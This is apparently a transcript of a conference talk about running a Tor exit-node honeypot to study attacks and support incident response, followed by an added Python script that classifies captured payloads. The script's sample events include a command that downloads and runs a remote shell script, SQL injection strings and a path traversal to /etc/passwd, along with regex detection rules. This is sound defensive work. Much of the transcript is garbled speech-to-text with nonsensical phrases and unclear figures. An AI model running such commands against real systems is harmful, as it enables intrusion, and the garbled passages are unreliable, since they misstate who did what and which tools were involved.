
security
and the C9, the mainstream part of this, as involving it behind the scenes, but it was not really good for the first one for that, and I'm really nervous.
Third point: for data exfiltration, the investigation generally starts and stops at the firewall. The issue is that when you're going through all these firewall logs and you see that the traffic for data exfiltration is going toward a Tor URL, generally you can't go beyond that, because at that point how do you find out who it really is, where that data is going, or what activity is happening behind it? So to understand that part better, and to understand what really happened, especially with a client, for
as part of that lab I was trying to understand, for a particular client who got hit, where Tor actually got in, because all the IPs and everything else that we were seeing were specifically coming from Tor and going down. It was completely Tor, no other connection. My name was somehow identified two patients here, especially between
a few things. By default, or by design, Tor doesn't log traffic, which is technically a good thing. At the same time, a lot of users are actually torrenting over Tor, which is troublesome; for example, I got more issues from people claiming copyright infringement than I got from law enforcement, and generally it should be the other way around. The other thing was inconsistent data: this is not structured data that's going through, it has all kinds of data, so it actually took a good amount of effort to understand what is happening with regard to the data, et cetera. At the same time, I was continually hammered by attacks from Tor and the internet, so there are other
people behind Tor IPs who are attacking the honeypot, as well as normal connections and so on that are also attacking the honeypot. As you can see in my little graph here, this is the authentication activity over a 24-hour period: the greens are the failures and the blues are the successes. So I don't have a lot of problem jobs to get the data out, because that was something that affected me that I could think of, but there were a lot of login failures, and each bar here represents one hour, so it's almost akin to an enterprise-grade system that is taking a beating, as compared to what happened on the Tor node. Now, as part of the node, to get the data
in a somewhat structured format, I set up a custom honeypot that was based on Glastopf, so I can get the data in a way that lets me track the vulnerabilities that are going through, especially to understand how these attacks happen, like when our client got breached. The idea that I was doing the attack was authority, so I wanted to learn more about how exactly this works, and I used Sumo Logic for the data analytics part, because I realized pretty quickly that without a big data solution this is too much data to just look at. So, a little background on the client that got hit. The client's internet-facing infrastructure, according to the client: printers; they actually
have Windows accessible; if you went to Shodan, services with telnet. They said this feature... I still don't get the point. They had web servers, websites and DMZ switches, standard. They had default Apache pages and the corresponding default solutions, including the reference which was supposed to be deleted about a decade and a half ago but was still there; firewall scale and IoT devices. Now, when we did our scan with their public IPs, domains and everything else out there, we found, among other things, Apache web servers, systems running Windows 2003, FTP servers without any authentication, and Linux servers running BusyBox. Now, if you're familiar with BusyBox, you'll notice that it's present in all the IoT devices; it's
an embedded Linux web server. What the attacker was able to do was use the harvested credentials they got from another domain controller that was spilling them, to log in, which was quite easy to happen at that point, and still is at this point, and they used the same credentials because they were the same default credentials that had not been changed in a decade. At that point you also have to wonder what the client's password policy was, if passwords were not changed for a decade, and the attacker had used a Tor connection to perform the compromise and all of the malicious acts. So I did a quick search on Shodan just to see how many BusyBox devices
are available: a little over 2000 at this point. So these are devices that definitely should be secured, especially if you're using hard-coded or default credentials that you never really bother changing. Now, specifically for the client, what is it that we saw? I saw a lot of attacks specifically using wget commands to download scripts from, say, another compromised website or compromised server that may belong to something else, which might be a legitimate company or a legitimate host, and then running these scripts directly on the machine. So this query, for example, will download the script, then change the permission to executable, and then execute the script, and then so on, and towards the end they
will launch a telnet session to take control of the devices. So I ran a search earlier this year and the activity was really peaking: in the 90-day time period for this search that was run, the activity actually really went up, and I've been noticing this a lot, especially thanks to COVID, since a lot more people are actually working from home; certain kinds of activities are actually increasing. I'll show you more on what kind specifically. So I took these same commands and happened
almost like in the last 30 days, 21 unique IPs that were hosting the malicious scripts, these from the popular virtual storage or virtual server providers and so on, and in some cases they actually belonged to legitimate companies that were compromised. I guess at one point there were 53 Tor IPs pushing the scripts. That means that, at the time I was running the node, in my case it was an exit node, which is how I can see all of this traffic, I had 53 different relay nodes who were sending me this information, and for the total targets, it's also the exit node, so I can actually see who's getting attacked: 4036 unique targets. Now,
the count that shows here is for how many times I saw this specific command run. So this first wget command ran 336 times, the next one 259 times. I'm not entirely sure why certain commands have higher numbers than others; my best guess for that part is that at one point in time the attacker was having good success with one set of IPs or one set of IOCs, and then they started moving to the next batch, so I guess the first batch had the best success rate and then it slowly got worse as time went on. Now, in this, do you think it could have been prevented? The BusyBox IoT device was compromised, as it was
externally accessible. In the client's case this device had no reason to be externally accessed. The client also did not actually go through a firewall review or anything else, so there were too many things missing in that case. The credentials that were harvested from the domain controller were reused throughout the environment; like I mentioned, they had some admin passwords that were not changed for a decade. Just imagine that password policy; it has probably started changing no matter what the client would say. And the bad guy used a Tor connection to perform the compromise and all of the malicious acts. So as far as we are concerned, either the Tor Project people had it, or the client, or someone who's
controlling all of the Tor system, what do you know. In these cases it makes it very hard to identify what the initial position is, what happens, and obviously patient zero. The only thing we can do from a firewall log is to understand what happened first, to try to work our way backwards to that. Even with all of those things identified, I'm still only able to get the traffic that's going through my node and not through the entire network, because there's no way my one node will have enough of a percentage or bandwidth share across all of the nodes that exist. Now I try to take all of the attacks that are coming in and use
what are called YARA rules and Sigma rules to try and classify or categorize the attacks as to specifically what is happening. Over the last 30 days it had a good variety of attacks, where about 50 were SQL injection; over the last year I had 97.4 percent of them being PHP injection. So even though PHP injection may have slowed down in the last 30 days, overall throughout the year, at least this year, I've noticed that a lot of people like to do PHP injection. So I try to dig deeper on what exactly it is that folks are trying to do, or what is going on in the background that's causing one side to be significantly higher as
compared to the other side. Now, other activities I've seen are things like directory traversal, which could be used with tools like DirBuster and so on as you're doing pen testing or trying to break in, with somebody doing it over Tor. There's a lot of web scanning, which is almost following the cyber kill chain framework, where you first go for recon and then the other steps, step by step, and that's the same thing that I've been seeing as part of the traffic as well: most attackers will do recon first and then they'll do something else. So to an extent this can be used to predict who's about to get attacked next: if there's a certain amount of scanning
across a certain number of devices, then other things have already happened, so it can be used to predict attacks and so on. It's also useful to understand the different methodologies that people are using. Like, one of the things I found was LDAP injection, and I've only used that when I'm doing red team assessments, so if you ever want to learn how somebody else is doing LDAP injection, either maliciously or potentially as part of a red team, this is a great way to pick up their methods without them ever knowing. Also for blue teams, you can use this to improve your defenses: you figure out what other people are doing. So as part of this I try to draw patterns from all those
things that are going in. I saw remote code execution going all around, I saw SQL injection, and through all of these I was trying to further classify things better into different categories. What I was able to convert that into was a live feed of the source of all of the attacks. Now in this case, this screenshot: I had initially planned to show a live dashboard, but I was worried about my internet dying or my audio, which already happened, so let's start with this. So this is a live dashboard, a live feed of different attacks fitted into categories. I'm taking all the attacks as they're coming in, on the left side, with the live feed with different
payloads that are in it, and then I'm filtering out the remote code execution, the SQL injections and so on. The objective here was to see if I can classify this in terms of what is a genuine thing versus what is someone playing around with a tool they found online, because that also happens, and many times you'll also encounter script kiddies in general who are attacking random websites, and possibly those people, at the same time, with RCE and SQL injection. I've tried to identify if there's any campaign going on, kind of like phishing and so on: you hear a lot of campaigns, that there's a malware campaign targeting such and such a person with phishing. My thought was,
can this same theory be applied to actual attacks that are happening through Tor, that people are using? So for that I was able to convert this into, say, standard templates of attacks. The one that you see on the left, for the PHP injection part, the majority of these are using one tool. As you can see here, that particular tool, I actually noticed, is the most pirated tool available for web application scanning, and a lot of people are running it over Tor just to hide themselves, but it still shows up. The one in the middle is like default or template-based cross-site scripting attacks, and on the right, interestingly, I found a lot more for SQL injection. So especially the SQL
injection: if you have seen the name of the table, apart from things like information_schema, which is like saying that I'm using a default table name, if you have a table name in pieces that actually shows a non-default table name or non-default database name being used, that's a clear indication that at that point that particular database has been compromised, because how else would someone external figure out the name of a table or a database unless they've had some access to it, and so on? So it actually identifies compromise. So at this point I was thinking how else, or rather what else, can I do on this, or how can I identify what specific tools
are being used, what's wrong, things that are obvious in the names. So with that I found something very interesting: I actually found a successful PHP injection attack that happened using a CMS-specific attack. So I saw a script with a payload specifically that is mentioning a specific file called xattacker.jpeg. Now if you're familiar with the tool XAttacker, then this would make sense. What XAttacker basically does is, it's an automated tool for exploitation and so on, and it's mostly used by private set and so on to attack sites; I've not seen anyone try legitimate use of it in pen testing, although it might be applicable. So this tool will first try to figure
out what CMS you have, WordPress, Joomla and so on. Based on that it is then going to run a command to check the, say, document root to try and upload shells if there's any vulnerability in any of the plugins or the themes, or, say, in this case it is uploaded and if it's outdated then it's going to try and upload a file to it. So in this case it's trying to upload the contents of a pastebin link. So whenever you write pastebin.com/raw/whatever the file is, that gives you the exact data; but if you do it without raw, it is just showing you the
pastebin page, and you are accessing the same full page with HTML tags and so on; putting it raw, you get the raw data. So in this case it is trying to download the file. If it doesn't work for whatever reason, a second check is going to check if it's set up to be administered via PHP, and it's going to try again. After it's done this, it is now going to execute the contents of the text file. So in this case this file, pastebin.com, the same opens as this text file; immediately when it opens you can see the name again: it is running a tool called XAttacker version 1.5. It is trying to set the file
to have execution permission, 644; it is trying to move the uploaded file to the temp folder; it's trying to change the permissions for it as well, and if everything succeeds it will say "success uploaded". In this case, or rather this particular string that we're looking at, this was after the whole attack had taken place, which made me realize that there might actually be more tools that are doing the whole automation of the attack, and a lot of people are using that combined with Tor to hide themselves much better. And this is the tool: it says it's a free website vulnerability scanner and auto exploiter. The essential use of the tool is either
you can define one IP or URL, or you give it a list of 600 URLs and it's going to automatically go through them directly, almost like the auto port 2 that used to exist for viralbot.
So based on all of this, I was trying to understand how I can map this back into something that makes more sense, so I decided to go with the MITRE ATT&CK framework, based on all of the attacks that I've seen so far as part of this research and so on. For initial access, the most common I've seen is exploitation of public-facing applications; that may be the IoT devices, that may be the web servers and so on. For execution I have seen scripting and service execution, especially with the remote command execution. For persistence I've seen access to external remote services. For discovery there's plenty of web scanning regardless; that's network
service scanning, device discovery or system discovery. For command and control, especially for things like a quartet tripod quad board q port and a few others, if you have ever looked at the traffic you will see that all of their outbound traffic or details is actually going to Tor, and through all of my systems I actually pick those up, just able to format them into much better looking systems as well. So through the same thing we also have a proxy and sometimes a custom command and control protocol. And all around, for the automatic exploitation, if there's, say, a cron job running that will push files out to a system hosted within Tor or on the inside, you'll see that,
and then again exfiltration over C2. Now I took all of this into an automated dashboard, in this case not showing live, just a screenshot. Then I was able to attribute the threats based on the YARA rules and Sigma rules, for them to qualify all of the traffic
to a threat actor. The name of the manual was polyphenols; it was part of the department figure. It's not the primitive pair; that is the most likely one, and these are indicators based on the TTPs identified up against the
database. There is a list of all of the groups and their TTPs and all the things they do and so on, so all the information, including things like what malware was used for many directions and so on, all the things that will happen especially with that system, with that activity, whatever traffic, gets automated against the MITRE ATT&CK framework,
and some of this, especially when it says just C2, in those cases there's also coalition against whatever three courses and increases, and just
the initial analysis. Once people break in, as the first part, the execution would be remote code execution and so on, and then command and control. So discovery in about a 90-day period was about 359,000-plus events; execution slightly more, at 360,000-plus events; initial access, it says, 2.5 million. So based on the traffic I analyzed, what came out of it was there are a few websites this is going through; I'm really seeing partial things come my way, but when it says initial access is 2.5 million, that's the initial attack that happened on these systems, and then the command and control,
and it's slowly coming back, kind of thing. I initially thought this might be related to Microsoft, when they said that they took down a botnet and a few other botnets; that news came out around October 19th or 20th. Can you see anything else? Although there's a challenge: they were actually working on taking it out, and that's why we saw the traffic drop, but even through this we could still track more C2 systems as they were going through. Now you may be wondering, out of all of this, how much is automated activity and how much is, say, someone actually taking action. Of all the activity of the attacks in the last month, I identified about 85.80 percent to be automated
tools. It could be like the one we saw earlier, for example; it could be someone using any of the other third-party tools that are meant for automated scanning; it could be someone using even Armitage, for that matter, where you can just click on Hail Mary and let it run on its own on all the different attacks. The differentiation I made for the actual exploit: things like, say, a remote code execution that was run specifically for an IP and only run a few times, just enough to break in and then stop, or something that didn't match any standard signatures. Now overall in this, what was the, say, split between different kinds of attacks and
non-attack traffic? I saw a lot; in the last 20 days it was mostly attack traffic, and velocity also mostly attack, but over the last three years, which is almost the length of time I've been running this, it's about 50/50. So the point here is, in attack traffic this would be attacks on systems, this would be, say, data exfiltration or infiltration, this would be specific things like, say, web scanning and all those things. The non-attack is regular traffic that was either encrypted, or something that could not be decrypted or deciphered, or something that was so unstructured that I couldn't make sense of it, so it just went in the non-attack category. It is interesting, though, that
all the attacks that I picked up were actually not encrypted. All of the attack commands, as they were leaving the exit node, none of them were encrypted, which is how I was able to get regular details on every single command and system that is running. So you're wondering at this point, how does it relate back to the IR I was on? With having all of this specific information, and understanding exactly how attacks are coming in, what the exact attack type is and the steps that are followed, I was able to collect all of the different kinds of attacks based on the applications in use by the client, for the IoT devices, for the
printers, which made them get off the network, and other devices that were exposed. I was literally able to identify what the correct attack time frame was. The attack time frame that you're looking at was from the time these first employment and then working on great networks; the first attackers actually took in the environment was also from power kind of attacks from Tor IPs, including a transit that may not be coming from the communities, and seeing the matching between them to understand better how to protect that client, and the last system, from that activity was actually quite useful in protecting them. The truth of the matter is there is so much evidence and so many IOCs that are
available from Tor if you know where to go, and by building a honeypot I was able to look better at how to proactively protect clients.
You can use that to learn how to see attacks happening, what specifically the attack is doing, and how you can better protect your clients in general. Also, Tor is technically not a dead end anymore. The benefit of running a honeypot on Tor, as opposed to a honeypot on your own: if you just run a honeypot by yourself, you're only seeing attacks that are coming to you; if you're running a honeypot on Tor, you're not only seeing the attacks coming at you as an exit node or so, you're also seeing the attacks going out. Sometimes it's almost like you're learning from somebody else's lesson, somewhat comfortable for security.
Like I mentioned, for this you can actually see where the attackers are coming from in terms of what tools and what methodologies and TTPs they're using, not specifically the locations, but you can see what they're doing, say a web scan first and then what they do next, and based on that you can predict when somebody is about to get a potential attack, or you see a lot of that scanning happening from certain IPs to a particular IP, or say to one that belongs to a client, or even to your own network; because you're seeing a lot of web scanning activity from certain IPs, it's guaranteed somebody's poking around your existing
So if you look through all of this, the possibility that exists for the enhancement of hunting activities could be acquiring more technical information, or just in general being better prepared for incidents, because now you know how to block things better; that definitely works. So that's it for my presentation. Any questions?

Matt: What do you mean by protecting yourself by using Tor?
As part of these activities I've actually seen other people using Tor to exploit other people who are currently using Tor and get out of their browsers. Generally, not using Tor from home is best, so my recommendation is: browse Tor, you can rent out like a VPS and run Tor from there, so in case something is compromised you'll just stand up a VPS and you can delete it and move on. Some people like to use Tails from home as a VM; they also forget that the entry node at that point can still find their IPs, because even if you're using Tails, technically your home might be still getting
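The talk describes three pieces of analysis done on the honeypot's exit-node traffic: classifying captured payloads with rule sets (in the spirit of the YARA and Sigma rules mentioned), mapping them to MITRE ATT&CK techniques, separating automated tooling from targeted activity by how many targets the same payload hits, and treating a SQL injection that names a non-default schema as a sign the database was already compromised. The script below is an added example and is not the speaker's tooling or rule set; the signature rules, the sample events (RFC 5737 test addresses), the automation threshold and the "watchlist" of scanned-but-not-yet-exploited targets are all constructed for illustration. The ATT&CK technique IDs are the public framework's.

```python
"""Classify attack payloads captured at a honeypot, the way the talk's dashboard does.

Added example (not the speaker's code). RULES, EVENTS and the thresholds are
constructed for illustration; ATT&CK IDs are from the public framework."""
import re
from collections import Counter, defaultdict

# Minimal signature rules: (category, ATT&CK technique, pattern). Constructed;
# a real Sigma/YARA set is far larger, but the matching logic is the same idea.
RULES = [
    ("rce", "T1059", re.compile(r"\b(wget|curl)\b.*\b(chmod|sh|bash)\b", re.I)),
    ("rce", "T1059", re.compile(r"(;|\|\||&&)\s*(wget|curl|chmod|sh|bash)\b", re.I)),
    ("sqli", "T1190", re.compile(r"(union\s+select|information_schema|'\s*or\s+1=1)", re.I)),
    ("php_injection", "T1190", re.compile(r"<\?php|php://input|allow_url_include", re.I)),
    ("traversal", "T1083", re.compile(r"(\.\./){2,}|%2e%2e%2f", re.I)),
    ("web_scan", "T1046", re.compile(r"/(wp-login\.php|phpmyadmin|\.env|\.git/)", re.I)),
]

# Schemas that exist on every MySQL/MariaDB install; naming anything else in an
# injected query implies the attacker already knows the application's schema.
DEFAULT_SCHEMAS = {"information_schema", "mysql", "performance_schema", "sys"}
FROM_RE = re.compile(r"\bfrom\s+([a-z_]\w*)(?:\.([a-z_]\w*))?", re.I)

# Constructed sample events seen at the exit node: (relay_ip, target, payload).
EVENTS = [
    ("10.0.0.1", "203.0.113.10", "cd /tmp; wget http://198.51.100.5/x.sh; chmod +x x.sh; sh x.sh"),
    ("10.0.0.2", "203.0.113.11", "cd /tmp; wget http://198.51.100.5/x.sh; chmod +x x.sh; sh x.sh"),
    ("10.0.0.3", "203.0.113.12", "cd /tmp; wget http://198.51.100.5/x.sh; chmod +x x.sh; sh x.sh"),
    ("10.0.0.4", "203.0.113.20", "GET /index.php?id=1 UNION SELECT table_name FROM information_schema.tables"),
    ("10.0.0.4", "203.0.113.20", "GET /index.php?id=1 UNION SELECT user,pass FROM shop_prod.customers"),
    ("10.0.0.5", "203.0.113.30", "GET /../../../../etc/passwd"),
    ("10.0.0.6", "203.0.113.31", "GET /wp-login.php"),
    ("10.0.0.6", "203.0.113.32", "GET /wp-login.php"),
    ("10.0.0.6", "203.0.113.33", "GET /wp-login.php"),
    ("10.0.0.7", "203.0.113.40", "GET /static/logo.png"),
]


def classify(payload):
    """Return (category, technique) for the first matching rule, else ('non_attack', None)."""
    for cat, tech, rx in RULES:
        if rx.search(payload):
            return cat, tech
    return "non_attack", None


def sqli_names_custom_schema(payload):
    """True when an injected SELECT reads FROM a schema that is not a built-in one."""
    m = FROM_RE.search(payload)
    return bool(m) and m.group(1).lower() not in DEFAULT_SCHEMAS


def analyze(events, automated_threshold=3):
    """Summarise events: counts per category/technique, top payloads, automated vs
    targeted payloads, likely-compromised databases, and scanned-only targets."""
    by_category, by_technique, payload_count = Counter(), Counter(), Counter()
    payload_targets = defaultdict(set)
    compromised, scanned, exploited = set(), set(), set()
    for _relay, target, payload in events:
        cat, tech = classify(payload)
        by_category[cat] += 1
        if cat == "non_attack":
            continue
        by_technique[tech] += 1
        payload_count[payload] += 1
        payload_targets[payload].add(target)
        if cat == "web_scan":
            scanned.add(target)
        elif cat in ("rce", "sqli", "php_injection"):
            exploited.add(target)
        if cat == "sqli" and sqli_names_custom_schema(payload):
            compromised.add(target)  # attacker already knows a non-default schema
    # The same payload fired at many distinct targets is tooling, not a hand-run attack.
    automated = {p for p, t in payload_targets.items() if len(t) >= automated_threshold}
    return {
        "by_category": dict(by_category),
        "by_technique": dict(by_technique),
        "top_payloads": payload_count.most_common(3),
        "automated": automated,
        "targeted": set(payload_targets) - automated,
        "likely_compromised": compromised,
        # Recon usually precedes exploitation, so these are the likely next victims.
        "watchlist": scanned - exploited,
    }


if __name__ == "__main__":
    for key, value in analyze(EVENTS).items():
        print(f"{key}: {value}")
```

Swapping `EVENTS` for parsed honeypot records keeps the rest unchanged; the threshold of three distinct targets is the only tunable, and in practice it should be set from the volume the node actually sees.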